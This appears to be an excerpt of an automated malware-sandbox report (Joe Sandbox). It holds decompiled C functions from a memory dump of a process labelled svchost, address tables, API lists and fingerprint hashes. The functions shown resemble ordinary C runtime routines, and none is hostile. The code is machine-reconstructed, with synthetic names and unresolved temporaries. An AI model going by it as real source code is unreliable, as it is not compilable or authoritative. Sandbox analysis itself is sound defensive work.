												_t102 = E00BDF150();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00BDF150();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00BDF150();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00BD495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00BC87B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00BCC9CE();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00BD1788();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                            0x00bd4658
                            0x00bd4663
                            0x00bd466a
                            0x00bd466c
                            0x00bd466c
                            0x00bd466e
                            0x00bd4677
                            0x00bd4679
                            0x00bd467e
                            0x00bd4684
                            0x00bd469a
                            0x00bd469f
                            0x00bd46a2
                            0x00bd46af
                            0x00bd46b4
                            0x00bd4708
                            0x00bd4710
                            0x00bd4712
                            0x00bd4714
                            0x00bd4717
                            0x00bd4717
                            0x00bd4717
                            0x00bd471d
                            0x00bd4725
                            0x00bd4738
                            0x00bd473b
                            0x00bd473d
                            0x00bd4740
                            0x00bd4741
                            0x00bd4762
                            0x00bd4765
                            0x00bd4765
                            0x00bd4743
                            0x00bd4743
                            0x00bd4745
                            0x00bd4750
                            0x00bd4750
                            0x00bd4752
                            0x00bd4759
                            0x00bd4754
                            0x00bd4754
                            0x00bd4754
                            0x00bd4752
                            0x00bd4766
                            0x00bd4768
                            0x00bd4769
                            0x00bd476c
                            0x00bd476e
                            0x00bd4778
                            0x00bd4782
                            0x00bd4770
                            0x00bd4770
                            0x00bd4770
                            0x00bd4787
                            0x00bd4787
                            0x00bd478c
                            0x00bd478f
                            0x00bd479a
                            0x00bd479a
                            0x00bd479a
                            0x00bd479a
                            0x00bd479e
                            0x00bd47a5
                            0x00bd47a6
                            0x00bd47a9
                            0x00bd47ac
                            0x00bd47ac
                            0x00bd47ae
                            0x00000000
                            0x00000000
                            0x00bd47c6
                            0x00bd47cd
                            0x00bd47d1
                            0x00bd47d4
                            0x00bd47d7
                            0x00bd47d9
                            0x00bd47d9
                            0x00bd47d9
                            0x00bd47db
                            0x00bd47de
                            0x00bd47e1
                            0x00bd47e3
                            0x00bd47eb
                            0x00bd47f1
                            0x00bd47f4
                            0x00bd47f7
                            0x00bd47f8
                            0x00bd47fb
                            0x00bd47fe
                            0x00bd47fe
                            0x00bd4803
                            0x00bd4806
                            0x00000000
                            0x00000000
                            0x00bd481e
                            0x00bd4823
                            0x00bd4827
                            0x00000000
                            0x00000000
                            0x00bd482b
                            0x00bd482e
                            0x00bd482f
                            0x00bd482f
                            0x00bd4831
                            0x00bd4834
                            0x00000000
                            0x00000000
                            0x00bd4836
                            0x00bd4839
                            0x00bd4840
                            0x00bd4843
                            0x00bd4846
                            0x00bd485c
                            0x00bd485c
                            0x00bd485c
                            0x00bd4848
                            0x00bd4848
                            0x00bd484a
                            0x00bd484d
                            0x00bd4858
                            0x00bd484f
                            0x00bd4852
                            0x00bd4852
                            0x00bd484d
                            0x00000000
                            0x00bd4846
                            0x00bd483b
                            0x00bd483b
                            0x00bd483d
                            0x00bd483d
                            0x00bd4791
                            0x00bd4791
                            0x00bd4794
                            0x00bd485f
                            0x00bd485f
                            0x00bd4861
                            0x00bd4863
                            0x00bd4866
                            0x00bd4867
                            0x00bd4868
                            0x00bd4869
                            0x00bd4871
                            0x00bd4871
                            0x00bd4871
                            0x00bd4873
                            0x00bd4876
                            0x00bd4879
                            0x00bd487b
                            0x00bd487b
                            0x00bd487d
                            0x00bd488f
                            0x00bd4893
                            0x00bd4896
                            0x00bd489d
                            0x00bd48a5
                            0x00bd48a5
                            0x00bd48a8
                            0x00bd48aa
                            0x00bd48bb
                            0x00bd48bb
                            0x00bd48bf
                            0x00bd48bf
                            0x00bd48c2
                            0x00bd48c4
                            0x00bd48c7
                            0x00000000
                            0x00bd48ac
                            0x00bd48ac
                            0x00bd48b2
                            0x00bd48b2
                            0x00bd48b6
                            0x00bd48c9
                            0x00bd48c9
                            0x00bd48cd
                            0x00bd48ce
                            0x00bd48d0
                            0x00bd48d2
                            0x00bd4913
                            0x00bd4913
                            0x00bd4915
                            0x00bd4922
                            0x00bd4922
                            0x00bd4924
                            0x00bd4926
                            0x00bd4927
                            0x00bd4928
                            0x00bd492f
                            0x00bd4932
                            0x00bd4934
                            0x00bd4934
                            0x00bd4935
                            0x00bd4937
                            0x00bd493a
                            0x00bd493a
                            0x00bd493c
                            0x00bd493e
                            0x00000000
                            0x00bd493e
                            0x00bd4917
                            0x00bd4919
                            0x00000000
                            0x00000000
                            0x00bd491b
                            0x00000000
                            0x00000000
                            0x00bd491d
                            0x00bd4920
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd4920
                            0x00bd48d9
                            0x00bd48df
                            0x00bd48df
                            0x00bd48e1
                            0x00bd48e2
                            0x00bd48e3
                            0x00bd48e4
                            0x00bd48eb
                            0x00bd48ee
                            0x00bd48f0
                            0x00bd48f1
                            0x00bd48f3
                            0x00bd4900
                            0x00bd4900
                            0x00bd4902
                            0x00bd4904
                            0x00bd4905
                            0x00bd4906
                            0x00bd490d
                            0x00bd4910
                            0x00bd4912
                            0x00bd4912
                            0x00000000
                            0x00bd4912
                            0x00bd48f5
                            0x00bd48f5
                            0x00bd48f7
                            0x00000000
                            0x00000000
                            0x00bd48f9
                            0x00000000
                            0x00000000
                            0x00bd48fb
                            0x00bd48fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd48fe
                            0x00bd48db
                            0x00bd48dd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd48dd
                            0x00bd48ae
                            0x00bd48b0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd48b0
                            0x00bd48aa
                            0x00000000
                            0x00bd4794
                            0x00bd478f
                            0x00bd46b6
                            0x00bd46b8
                            0x00000000
                            0x00bd46ba
                            0x00bd46d0
                            0x00bd46d5
                            0x00bd46d7
                            0x00bd46e3
                            0x00bd46e9
                            0x00bd46ea
                            0x00bd46ec
                            0x00bd46ee
                            0x00bd46f9
                            0x00bd46f9
                            0x00bd46fc
                            0x00bd46fe
                            0x00bd46fe
                            0x00bd4701
                            0x00bd46d9
                            0x00bd46d9
                            0x00bd46d9
                            0x00000000
                            0x00bd46d7
                            0x00bd4686
                            0x00bd4686
                            0x00bd468d
                            0x00bd468e
                            0x00bd4690
                            0x00bd4942
                            0x00bd4946
                            0x00bd494b
                            0x00bd494b
                            0x00bd495a
                            0x00bd495a

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: c50bb584b5063c146eea2d108769c43b03df65859e4f7d324771ca81a86585ab
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: BEA144729002869FEB218F28C8917AEFBE1EF52350F1841EFE5959B382E7398D41C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BCCBFB, Relevance: 6.2, APIs: 4, Instructions: 172pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00BCCBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				char _v64;
				void _v72;
				long _v76;
				intOrPtr _v80;
				char _v84;
				void* __ebx;
				signed int _t53;
				intOrPtr _t66;
				signed int _t68;
				int _t70;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				intOrPtr _t98;
				signed int _t104;
				signed int _t109;
				signed int _t111;
				signed int _t118;
				void* _t121;
				intOrPtr* _t128;
				signed int _t130;
				intOrPtr _t140;

				_t118 = __edx;
				_t53 =  *0xbec008; // 0xdc55bb75
				_v8 = _t53 ^ _t130;
				_t128 = _a16;
				_t121 = _a12;
				_v80 = _a4;
				_v76 = _t121;
				_t104 = GetFileType(_t121) & 0xffff7fff;
				if(_t104 != 1) {
					__eflags = _t104 - 2;
					if(_t104 == 2) {
						L16:
						__eflags = _t104 - 2;
						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t128 + 8)) = 1;
						_t66 = _a8;
						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
						 *_t128 = _t66;
						__eflags = _t104 - 2;
						if(_t104 != 2) {
							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
							__eflags = _t70;
							if(_t70 != 0) {
								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
							}
						}
						_t68 = 1;
						__eflags = 1;
						L20:
						E00BC786A();
						return _t68;
					}
					__eflags = _t104 - 3;
					if(_t104 == 3) {
						goto L16;
					}
					__eflags = _t104;
					if(_t104 != 0) {
						L15:
						E00BCC998(GetLastError());
						L14:
						_t68 = 0;
						goto L20;
					}
					 *((intOrPtr*)(E00BCC9CE())) = 9;
					goto L14;
				}
				 *((short*)(_t128 + 8)) = 1;
				_t74 = _v80;
				if(_v80 == 0) {
					L4:
					_t109 = 0xa;
					memset( &_v48, 0, _t109 << 2);
					if(E00BD38BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
						goto L15;
					}
					 *((short*)(_t128 + 6)) = E00BCCF2D(0, _v16, _v80);
					_t81 = E00BCCDB3(_v32, _v28, 0, 0);
					 *(_t128 + 0x20) = _t81;
					 *(_t128 + 0x24) = _t118;
					if((_t81 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t24 = _t128 + 0x20; // 0x83cc758d
					_t83 = E00BCCDB3(_v40, _v36,  *_t24, _t118);
					 *(_t128 + 0x18) = _t83;
					 *(_t128 + 0x1c) = _t118;
					if((_t83 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t29 = _t128 + 0x24; // 0xcb830cc4
					_t30 = _t128 + 0x20; // 0x83cc758d
					_t85 = E00BCCDB3(_v48, _v44,  *_t30,  *_t29);
					 *(_t128 + 0x28) = _t85;
					 *(_t128 + 0x2c) = _t118;
					_t144 = (_t85 & _t118) - 0xffffffff;
					if((_t85 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t111 = 6;
					memset( &_v72, 0, _t111 << 2);
					if(E00BD38BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
						goto L15;
					}
					_t39 = _t128 + 0x14; // 0xbccb3d
					_t68 = E00BCCEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
					goto L20;
				}
				_v84 = 0;
				if(E00BCCF93(_t74,  &_v84) == 0) {
					goto L14;
				}
				_t98 = _v84 - 1;
				_t140 = _t98;
				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
				 *_t128 = _t98;
				goto L4;
			}

































                            0x00bccbfb
                            0x00bccc03
                            0x00bccc0a
                            0x00bccc12
                            0x00bccc16
                            0x00bccc1a
                            0x00bccc1d
                            0x00bccc2a
                            0x00bccc33
                            0x00bccd2e
                            0x00bccd31
                            0x00bccd5a
                            0x00bccd61
                            0x00bccd6c
                            0x00bccd73
                            0x00bccd77
                            0x00bccd7a
                            0x00bccd7d
                            0x00bccd7f
                            0x00bccd82
                            0x00bccd8f
                            0x00bccd95
                            0x00bccd97
                            0x00bccd9c
                            0x00bccd9c
                            0x00bccd97
                            0x00bccda1
                            0x00bccda1
                            0x00bccda2
                            0x00bccdaa
                            0x00bccdb2
                            0x00bccdb2
                            0x00bccd33
                            0x00bccd36
                            0x00000000
                            0x00000000
                            0x00bccd38
                            0x00bccd3a
                            0x00bccd4b
                            0x00bccd52
                            0x00bccd47
                            0x00bccd47
                            0x00000000
                            0x00bccd47
                            0x00bccd41
                            0x00000000
                            0x00bccd41
                            0x00bccc39
                            0x00bccc3f
                            0x00bccc44
                            0x00bccc66
                            0x00bccc68
                            0x00bccc70
                            0x00bccc81
                            0x00000000
                            0x00000000
                            0x00bccc98
                            0x00bccc9f
                            0x00bccca4
                            0x00bcccac
                            0x00bcccb2
                            0x00000000
                            0x00000000
                            0x00bcccb9
                            0x00bcccc2
                            0x00bcccc7
                            0x00bccccf
                            0x00bcccd5
                            0x00000000
                            0x00000000
                            0x00bcccd7
                            0x00bcccda
                            0x00bccce3
                            0x00bccce8
                            0x00bcccf0
                            0x00bcccf3
                            0x00bcccf6
                            0x00000000
                            0x00000000
                            0x00bcccfa
                            0x00bccd00
                            0x00bccd16
                            0x00000000
                            0x00000000
                            0x00bccd18
                            0x00bccd29
                            0x00000000
                            0x00bccd29
                            0x00bccc49
                            0x00bccc57
                            0x00000000
                            0x00000000
                            0x00bccc60
                            0x00bccc60
                            0x00bccc61
                            0x00bccc64
                            0x00000000

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00BCCC20
                              • Part of subcall function 00BCCF93: __dosmaperr.LIBCMT ref: 00BCCFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BCCB29), ref: 00BCCD4B
                            • __dosmaperr.LIBCMT ref: 00BCCD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00BCCD8F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction ID: e9b46a2f8cf11b53259e913c3f8b379091bb73f3fe4e20c5d45db6fd7413b7b7
                            • Opcode Fuzzy Hash: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction Fuzzy Hash: 5551A172900608AFDB14DFB8CC41EAEBFF9EF18310B14857DE55AD7260EB7099459B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDCE51, Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00BDCE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E00BD2807(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E00BD2807(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E00BD2807(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E00BCC9CE()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E00BD2807(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E00BCE926(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E00BCC9CE())) = 0xd;
							_t30 = E00BCC9BB();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E00BD0B10(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E00BCD960(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E00BD308B(_t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E00BCC9BB();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E00BCC9CE())) = 0xd;
										}
										L23:
										_t38 = E00BCC9CE();
										E00BD09EB(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E00BCD960(_t56, _t59, _v12);
							E00BD09EB(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E00BCC9CE())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E00BCC9CE()));
			}





























                            0x00bdce51
                            0x00bdce5b
                            0x00bdce5e
                            0x00bdce65
                            0x00bdce6c
                            0x00bdce71
                            0x00bdce74
                            0x00bdce7a
                            0x00bdce8d
                            0x00bdce94
                            0x00bdce97
                            0x00bdce99
                            0x00bdce9c
                            0x00000000
                            0x00000000
                            0x00bdcea2
                            0x00bdcea2
                            0x00bdcea4
                            0x00bdcea7
                            0x00bdcea9
                            0x00bdceac
                            0x00bdcf8a
                            0x00bdcf8a
                            0x00bdcf8c
                            0x00bdcf43
                            0x00bdcf4b
                            0x00bdcf55
                            0x00bdcf58
                            0x00bdcfd9
                            0x00bdcfd9
                            0x00bdcfdb
                            0x00000000
                            0x00bdcfdb
                            0x00bdcf5a
                            0x00bdcf5f
                            0x00000000
                            0x00bdcf5f
                            0x00bdcf8e
                            0x00bdcf94
                            0x00bdcf9c
                            0x00bdcfa3
                            0x00bdcfa6
                            0x00bdcfa9
                            0x00000000
                            0x00000000
                            0x00bdcfb3
                            0x00bdcfb9
                            0x00bdcfbb
                            0x00000000
                            0x00000000
                            0x00bdcfc2
                            0x00bdcfc8
                            0x00bdcfd5
                            0x00000000
                            0x00bdcfd5
                            0x00bdcf90
                            0x00bdcf92
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdcf92
                            0x00bdceb2
                            0x00bdcebc
                            0x00bdcec8
                            0x00bdcecb
                            0x00bdcecc
                            0x00bdcece
                            0x00bdceec
                            0x00bdceef
                            0x00bdcef2
                            0x00bdcef3
                            0x00bdcef3
                            0x00bdcef5
                            0x00bdcf08
                            0x00bdcf08
                            0x00bdcf0a
                            0x00bdcf0d
                            0x00bdcf12
                            0x00bdcf15
                            0x00bdcf18
                            0x00bdcf63
                            0x00bdcf68
                            0x00bdcf6b
                            0x00bdcf72
                            0x00bdcf72
                            0x00bdcf78
                            0x00bdcf78
                            0x00bdcf80
                            0x00bdcf86
                            0x00000000
                            0x00bdcf86
                            0x00bdcf1a
                            0x00bdcf1b
                            0x00bdcf1d
                            0x00bdcf20
                            0x00bdcf22
                            0x00bdcf25
                            0x00bdcf27
                            0x00bdcf01
                            0x00bdcf01
                            0x00000000
                            0x00bdcf01
                            0x00bdcf29
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdcf29
                            0x00bdcef7
                            0x00000000
                            0x00000000
                            0x00bdcef9
                            0x00bdceff
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdcf2b
                            0x00bdcf2b
                            0x00bdcf2b
                            0x00bdcf33
                            0x00bdcf39
                            0x00bdcf3e
                            0x00bdcf41
                            0x00bdcf41
                            0x00000000
                            0x00bdcf41
                            0x00bdced5
                            0x00000000
                            0x00bdced5
                            0x00bdceb4
                            0x00bdceb6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdceb6
                            0x00bdce7c
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 3ed2eb14e085e04a71be2fd7e66939f97af101bae58caf66e93b8d8181cc0d62
                            • Instruction ID: 6c6ead3a4e42ba2941cfce1586f49ed59c1afe2312f8a0d904199670d82ea225
                            • Opcode Fuzzy Hash: 3ed2eb14e085e04a71be2fd7e66939f97af101bae58caf66e93b8d8181cc0d62
                            • Instruction Fuzzy Hash: 7E413B72A001026BDB256B788C81BEEBEE6DF11730F2406E7F419D6392F6744945D361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BD8041, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E00BD8041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0xbec008; // 0xdc55bb75
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00BCAFAE(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E00BC786A();
					return _t67;
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00BC8520(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E00BD815E(_t71);
					goto L15;
				}
				asm("sbb eax, eax");
				_t47 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00BD0A25(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00BDF250();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                            0x00bd8049
                            0x00bd8050
                            0x00bd8053
                            0x00bd805c
                            0x00bd8061
                            0x00bd8066
                            0x00bd806b
                            0x00bd806e
                            0x00bd8070
                            0x00bd8070
                            0x00bd8075
                            0x00bd808e
                            0x00bd8094
                            0x00bd8099
                            0x00bd8138
                            0x00bd813c
                            0x00bd8141
                            0x00bd8141
                            0x00bd8155
                            0x00bd815d
                            0x00bd815d
                            0x00bd809f
                            0x00bd80a7
                            0x00bd80ab
                            0x00bd80f7
                            0x00bd80f9
                            0x00bd80fb
                            0x00bd8100
                            0x00bd8117
                            0x00bd811f
                            0x00bd812f
                            0x00bd812f
                            0x00bd811f
                            0x00bd8131
                            0x00bd8132
                            0x00000000
                            0x00bd8137
                            0x00bd80b2
                            0x00bd80b4
                            0x00bd80b6
                            0x00bd80be
                            0x00bd80db
                            0x00bd80e5
                            0x00bd80ea
                            0x00000000
                            0x00000000
                            0x00bd80ec
                            0x00bd80f2
                            0x00bd80f2
                            0x00000000
                            0x00bd80f2
                            0x00bd80c2
                            0x00bd80c6
                            0x00bd80cb
                            0x00bd80cf
                            0x00000000
                            0x00000000
                            0x00bd80d1
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BD3E2E,?,00000000,?,00000001,?,?,00000001,00BD3E2E,?), ref: 00BD808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BD8117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BD0C3C,?), ref: 00BD8129
                            • __freea.LIBCMT ref: 00BD8132
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
